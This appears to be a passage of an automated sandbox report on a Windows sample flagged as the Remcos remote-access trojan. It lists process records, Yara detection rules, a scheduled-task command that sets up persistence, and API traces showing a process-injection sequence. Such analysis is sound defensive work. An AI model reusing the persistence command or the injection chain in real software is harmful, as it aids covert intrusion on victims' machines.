          MD5 hash:48C2FE20575769DE916F48EF0676A965
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:6
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:7
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Imagebase:0x170000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:8
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Imagebase:0x6e0000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:low
          Has exited:false

          Target ID:9
          Start time:05:37:57
          Start date:28/08/2024
          Path:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          Imagebase:0xb60000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          • Detection: 32%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:11
          Start time:05:37:58
          Start date:28/08/2024
          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Imagebase:0x7ff717f30000
          File size:496'640 bytes
          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:12
          Start time:05:37:59
          Start date:28/08/2024
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"
          Imagebase:0x7ff66e660000
          File size:187'904 bytes
          MD5 hash:48C2FE20575769DE916F48EF0676A965
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:13
          Start time:05:37:59
          Start date:28/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:14
          Start time:05:37:59
          Start date:28/08/2024
          Path:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
          Imagebase:0xec0000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:low
          Has exited:true


            Execution Graph

            Execution Coverage:11%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:2.2%
            Total number of Nodes:225
            Total number of Limit Nodes:15
            execution_graph (rendered interactively in the original report; raw node/edge data omitted)
            • Nodes carrying API calls, 00FA0000 dump: fa4514 / fa5918 CreateActCtxA; faafe0 GetModuleHandleW; faa188 / fab620 LoadLibraryExW; fad688 DuplicateHandle; fad440 chain GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
            • Nodes carrying API calls, 07390000 dump: 7393e74 / 7393e80 / 7393f09 CreateProcessA; 7393b30 / 7393b38 / 7393b78 VirtualAllocEx; 7393bf0 / 7393bf8 / 7393c40 WriteProcessMemory; 7393ce0 / 7393ce8 / 7393d33 ReadProcessMemory; 7393a59 / 7393a60 / 7393aa5 Wow64SetThreadContext; 73939a9 / 73939b0 / 73939f0 ResumeThread; 73982a0 PostMessageW
            • Injection path from the dispatcher at 739694c: CreateProcessA, then VirtualAllocEx (via 73979b8 / 73979c8), WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread on the created process
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a6088848959339778b2db6458ade9d96f06fba37bd90cad81f46321194edac9c
            • Instruction ID: ec9fb48a8c627779134942b2049155f24a8bc0dbffc79345fad4ddfa752916ac
            • Opcode Fuzzy Hash: a6088848959339778b2db6458ade9d96f06fba37bd90cad81f46321194edac9c
            • Instruction Fuzzy Hash: 763116B5E19228CFEF64DF54C941BE8BBB9AB4A300F1090EAD50DA7681D7709AC5CF40

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 00FAD4BE
            • GetCurrentThread.KERNEL32 ref: 00FAD4FB
            • GetCurrentProcess.KERNEL32 ref: 00FAD538
            • GetCurrentThreadId.KERNEL32 ref: 00FAD591
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: e4968a53d0ced267502286c564373d964601533f27bfe642a6cb3835f9401325
            • Instruction ID: 44cd2cc68a4370f52d0679c14016b2fe3df130172b9ddc2705968dfdfb621d8a
            • Opcode Fuzzy Hash: e4968a53d0ced267502286c564373d964601533f27bfe642a6cb3835f9401325
            • Instruction Fuzzy Hash: A75165B0D003498FDB54CFA9D548BEEBBF1BF88318F24845AE419A7390DB785944CB65

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 00FAD4BE
            • GetCurrentThread.KERNEL32 ref: 00FAD4FB
            • GetCurrentProcess.KERNEL32 ref: 00FAD538
            • GetCurrentThreadId.KERNEL32 ref: 00FAD591
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: cc8024c93cbcce46eeea77e825a0f32bb01f59fa785300259d51fcb13b9a5cdf
            • Instruction ID: 9bd753001aab5fc5cfdbd2cad7104b1754cd2bf7cc4579ba2e8eab2fecb98da2
            • Opcode Fuzzy Hash: cc8024c93cbcce46eeea77e825a0f32bb01f59fa785300259d51fcb13b9a5cdf
            • Instruction Fuzzy Hash: D85153B0D003498FDB54CFAAD648BDEBBF1BF88318F248459E419A7360DB74A944CB65

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: $
            • API String ID: 0-227171996
            • Opcode ID: 6bc367701b95384fc4b2e2506d25a48b79a827f0c5c072fc12483fb5afcb4690
            • Instruction ID: b6304124bc551c2922a7550aeb9e1ac5b6de582c46524de06118bd81d06464da
            • Opcode Fuzzy Hash: 6bc367701b95384fc4b2e2506d25a48b79a827f0c5c072fc12483fb5afcb4690
            • Instruction Fuzzy Hash: 74719071910701CFEB11EF2CE8C9655B7F1FF95304B4186A8D949AB32AEB71E984CB80

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 5232aec-5234cda; calls 5235708 / 5235718, 5232b1c, 5231968, 5232b2c
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: $
            • API String ID: 0-227171996
            • Opcode ID: a80e5f5b21cf1fdb978c76178deeefb00b9614d44887d897ecd340d1a234edc6
            • Instruction ID: 399cc68c6a163cf34a0fc5f5c8e87608fb39e0214c5fd69310d5f6953f6a5917
            • Opcode Fuzzy Hash: a80e5f5b21cf1fdb978c76178deeefb00b9614d44887d897ecd340d1a234edc6
            • Instruction Fuzzy Hash: 36717F31910701CFEB11EF2DE4C9655B7F1FF95304B4186A9D949AB32AEB71E988CB80

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393e74-73941c5; CreateProcessA called from block 739400f-73940c9
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073940B6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: 70dd57d741e5f699cc01b97f40384ef4412fd190cb68ac48b32923f2ce93fcc9
            • Instruction ID: 241975bcb43ae0fcdc607f54ac7efb7c95be2235b9c30f47188409fa01a2d21a
            • Opcode Fuzzy Hash: 70dd57d741e5f699cc01b97f40384ef4412fd190cb68ac48b32923f2ce93fcc9
            • Instruction Fuzzy Hash: 11A14AB1D0125ADFEF24CF68C8417DEBBB2AF48314F1481A9E809A7240EB759985CF91

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393e80-73941c5; CreateProcessA called from block 739400f-73940c9
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073940B6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: ba1fe5617efdf809381b2855c537a2cb74d3a204208c34495ad4d28633efc6b2
            • Instruction ID: 2f619ebdc26e08f079f2dc7ae92f3c33f2d70c5a9d8677cf08b5a367d2e56c9c
            • Opcode Fuzzy Hash: ba1fe5617efdf809381b2855c537a2cb74d3a204208c34495ad4d28633efc6b2
            • Instruction Fuzzy Hash: E1913AB1D0125ADFEF24CF69C84179EBBB2AF48314F1481A9E809A7240EB759985CF91

            Control-flow Graph (rendered graph omitted)
            • Basic blocks faada8-fab028; calls faa120, fab040 / fab031, faa12c, faa13c, faa14c, faa15c; GetModuleHandleW called from block faafe0-fab00b
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAFFE
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: b64cabb7fea2a8aee5c76657bac4dc157fd1a03779aab3f9c1127e56a7031009
            • Instruction ID: 21d38c33ff5efff1958bb52e8036f7010057a3202593755213b97c4b97bfee37
            • Opcode Fuzzy Hash: b64cabb7fea2a8aee5c76657bac4dc157fd1a03779aab3f9c1127e56a7031009
            • Instruction Fuzzy Hash: 4F7134B0A00B058FDB24DF2AD44575ABBF1FF89314F008A2DD48AD7A40DB75E949DB91

            Control-flow Graph (rendered graph omitted)
            • Basic blocks fa590c-fa5a61; CreateActCtxA called from block fa5918-fa59d9
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 00FA59C9
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 963e9c435735e0b5466edeb89d952b594f5daa88f2585a758103fb8c66d196b7
            • Instruction ID: ad25f3135279a78e39145830a0bd37de5d4b23fff57e499d4e02e107d255ad33
            • Opcode Fuzzy Hash: 963e9c435735e0b5466edeb89d952b594f5daa88f2585a758103fb8c66d196b7
            • Instruction Fuzzy Hash: AB41F2B1C0071DCBEB25CFA9C884BDEBBB5BF49714F20815AD408AB251DB755946CF90

            Control-flow Graph (rendered graph omitted)
            • Basic blocks fa4514-fa5a61; CreateActCtxA called from block fa4514-fa59d9
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 00FA59C9
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: a2ff20ba334ea1b0e886250f7cb371e27d9950561490fc6f512ecd08f4781981
            • Instruction ID: b90eb5b7be9a1ea6a74da20f91c9397b9ae035bce6169a4ea504ae3352ef0394
            • Opcode Fuzzy Hash: a2ff20ba334ea1b0e886250f7cb371e27d9950561490fc6f512ecd08f4781981
            • Instruction Fuzzy Hash: 4341F3B1C0072DCBEB24CFA9C98479EFBB5BF49714F20815AD408AB251DB756949CF90

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393bf0-7393cce; WriteProcessMemory called from block 7393c56-7393c95
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07393C88
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: a1f978cb55dc1ceb818fb1248af5c07d50b1d02a6cf99b33429e2fb058e2a41a
            • Instruction ID: 8a76630c7af84f1225c6bf5d38d0b4b0f3664b1955af66e1f7212a92578f6fc3
            • Opcode Fuzzy Hash: a1f978cb55dc1ceb818fb1248af5c07d50b1d02a6cf99b33429e2fb058e2a41a
            • Instruction Fuzzy Hash: EE2125B19003499FDB10DFAAC981BDEBBF5FF48310F10842AE959A7240D7789950CBA4

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393bf8-7393cce; WriteProcessMemory called from block 7393c56-7393c95
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07393C88
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: b9592193e5d6fe04f32c144b323d0ae8149296843064156353660011343e69dd
            • Instruction ID: cc01a65262cc0cb83c7dfa96a5fe2507d8bbe8a4f5995aafb42a3fe90555128f
            • Opcode Fuzzy Hash: b9592193e5d6fe04f32c144b323d0ae8149296843064156353660011343e69dd
            • Instruction Fuzzy Hash: FC2115B59003499FDF10CFAAC985BDEBBF5FF48310F10842AE958A7240D7789950CBA5

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393ce0-7393dae; ReadProcessMemory called from block 7393ce0-7393d75
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07393D68
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: ca158523474b3999cf18bc2b27df37cfdc23484e525671ed6d2be8f89506eafb
            • Instruction ID: 8389047107d6560de1886dfc3a2fcac4d0f5312a5cc27f1fe11a828721973230
            • Opcode Fuzzy Hash: ca158523474b3999cf18bc2b27df37cfdc23484e525671ed6d2be8f89506eafb
            • Instruction Fuzzy Hash: 752127B18003499FDB10DFAAC840ADEFBF5FF48310F20842AE559A7240C7799501DBA5

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393a59-7393b24; Wow64SetThreadContext called from block 7393abb-7393aeb
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07393ADE
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 6db2799c5a491e94b9068b50a4347c052234df2ecee06bd6320abc38ca96dcd3
            • Instruction ID: cec7761239e637c3e7b62e7811b58e40840cff783052b4fb4ba8f20e9c1ad07c
            • Opcode Fuzzy Hash: 6db2799c5a491e94b9068b50a4347c052234df2ecee06bd6320abc38ca96dcd3
            • Instruction Fuzzy Hash: DB216AB590030A9FEB10DFAAC4817EEBBF4EF48314F148429D519A7240CB789945CFA0

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393ce8-7393dae; ReadProcessMemory called from block 7393ce8-7393d75
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07393D68
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 1ae32376beafc39ca987844d60946b82e9e8c0e6d4a46f19849a42efce7b501e
            • Instruction ID: 19b4f74aedc3922a0809d8ef9a6f5cfb7b2bcf90f9af574226a0cb5439522366
            • Opcode Fuzzy Hash: 1ae32376beafc39ca987844d60946b82e9e8c0e6d4a46f19849a42efce7b501e
            • Instruction Fuzzy Hash: A921E6B29003599FDF10DFAAC881BDEBBF5FF48310F14842AE519A7240D7799950CBA5

            Control-flow Graph (rendered graph omitted)
            • Basic blocks 7393a60-7393b24; Wow64SetThreadContext called from block 7393abb-7393aeb
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07393ADE
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: ContextThreadWow64
            • String ID:
            • API String ID: 983334009-0
            • Opcode ID: 2fc7d87e74bc229ce75984d779ead22228769c36e7f387f5a0e03fcdb5ed970b
            • Instruction ID: ef778f8c557c45e7a25b369a73a15ae67b71adff5ebfce1e99565794966e1d57
            • Opcode Fuzzy Hash: 2fc7d87e74bc229ce75984d779ead22228769c36e7f387f5a0e03fcdb5ed970b
            • Instruction Fuzzy Hash: BD211AB19003099FEB10DFAAC4857AEBBF4EF48314F148429D519A7240DB789944CFA5
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAD70F
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 2b17a0c474d6a263c05e53ac40f941b277fb22cfe8bea6601d0f7f17dd447bcf
            • Instruction ID: 62b25e75567cd90e5fc621724addcc58c8ac6428c4ee9206ae2301b04092c404
            • Opcode Fuzzy Hash: 2b17a0c474d6a263c05e53ac40f941b277fb22cfe8bea6601d0f7f17dd447bcf
            • Instruction Fuzzy Hash: CC21C4B5900249DFDB10CF9AD984ADEFBF8FB48320F14841AE914A7350D375A954CF65
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAD70F
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 27325aac6f0521c62e44d1154e241df30e4b1844225729456249dc2747b003e6
            • Instruction ID: a19b3962b7145651d1dbcace961608eb933210cc98de304430d7f48b724e8324
            • Opcode Fuzzy Hash: 27325aac6f0521c62e44d1154e241df30e4b1844225729456249dc2747b003e6
            • Instruction Fuzzy Hash: 4421E3B5900249DFDB10CFA9D984ADEBBF4FB48324F14841AE914A3210D378A954CF60
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAB079,00000800,00000000,00000000), ref: 00FAB68A
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 93ce4cf6e48e64f7c4795649d4fe85b650486af0a043fe15a08eee0112c7aa27
            • Instruction ID: c627a3513cdcf183b23a5fde3ef61d89e112566d62c0645ed0ae3490bf9cb9fd
            • Opcode Fuzzy Hash: 93ce4cf6e48e64f7c4795649d4fe85b650486af0a043fe15a08eee0112c7aa27
            • Instruction Fuzzy Hash: 691100B6C003099FDB10CF9AC844B9EFBF4EB89320F14846AE519A7301C3B5A944CFA4
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07393BA6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: ff214720d620c215f0b0bd28598c3ea4ce974a3d4e8d3eaf572e14001cbe12c8
            • Instruction ID: 34be4bb6b3d7c5b343fe15d51734b0c0d0fdd8d422d584d85c4d183984222e35
            • Opcode Fuzzy Hash: ff214720d620c215f0b0bd28598c3ea4ce974a3d4e8d3eaf572e14001cbe12c8
            • Instruction Fuzzy Hash: F5114A728003499FDF10DFAAC844BDEBFF5EF88310F148419E519A7250C7759950CB91
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07393BA6
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 8ca7cc218333c1980c5ddc5a51f3e5d01ce9f7a0bbe01a1a914c66c6c3dafe23
            • Instruction ID: c33dc6ea7fd142195fc273064ac5e66926a354f4710347482baa40de729e38c7
            • Opcode Fuzzy Hash: 8ca7cc218333c1980c5ddc5a51f3e5d01ce9f7a0bbe01a1a914c66c6c3dafe23
            • Instruction Fuzzy Hash: DC1129B69003499FDF10DFAAC845BDEBFF5EF88320F148419E519A7250C7759950CBA1
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: ResumeThread
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAB079,00000800,00000000,00000000), ref: 00FAB68A
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: LibraryLoad
            APIs
            • PostMessageW.USER32(?,00000010,00000000,?), ref: 073982FD
            Memory Dump Source
            • Source File: 00000000.00000002.2130652080.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7390000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessagePost
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAFFE
            Memory Dump Source
            • Source File: 00000000.00000002.2121104610.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HandleModule
            • Instruction Fuzzy Hash: 0E314FB5D143089FDB14DFAAC845A9EFBF9EF88210F14846AE519E7300D775A904CB60
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ba8443340b8eccee68242365ee265c0133034db3a74cc3ed77ad27e01a09b514
            • Instruction ID: 5dbe51715bc0b329977540ca3bb04f543e02d367d36bc5749025abcf096623f5
            • Opcode Fuzzy Hash: ba8443340b8eccee68242365ee265c0133034db3a74cc3ed77ad27e01a09b514
            • Instruction Fuzzy Hash: 433174B4B242158FCB04DBA9C885EADBBF6BF49704F1040A9E606DB3A2CB71DC04CB50
            Memory Dump Source
            • Source File: 00000000.00000002.2126556807.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_5230000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: aaed2d409dfbedb8386a42a8db1973849c85908d63657cf9205ca93cad3cc9d4
            • Instruction ID: dcdeec0501e55008726c127bc7edcde34dcf069c3864ef4bde39391fb07910e2
            • Opcode Fuzzy Hash: aaed2d409dfbedb8386a42a8db1973849c85908d63657cf9205ca93cad3cc9d4
            • Instruction Fuzzy Hash: B831BFB1F20216DFCF14EBB8D8896AEB7F6BF49200F144169E506E7350EBB49941CB91
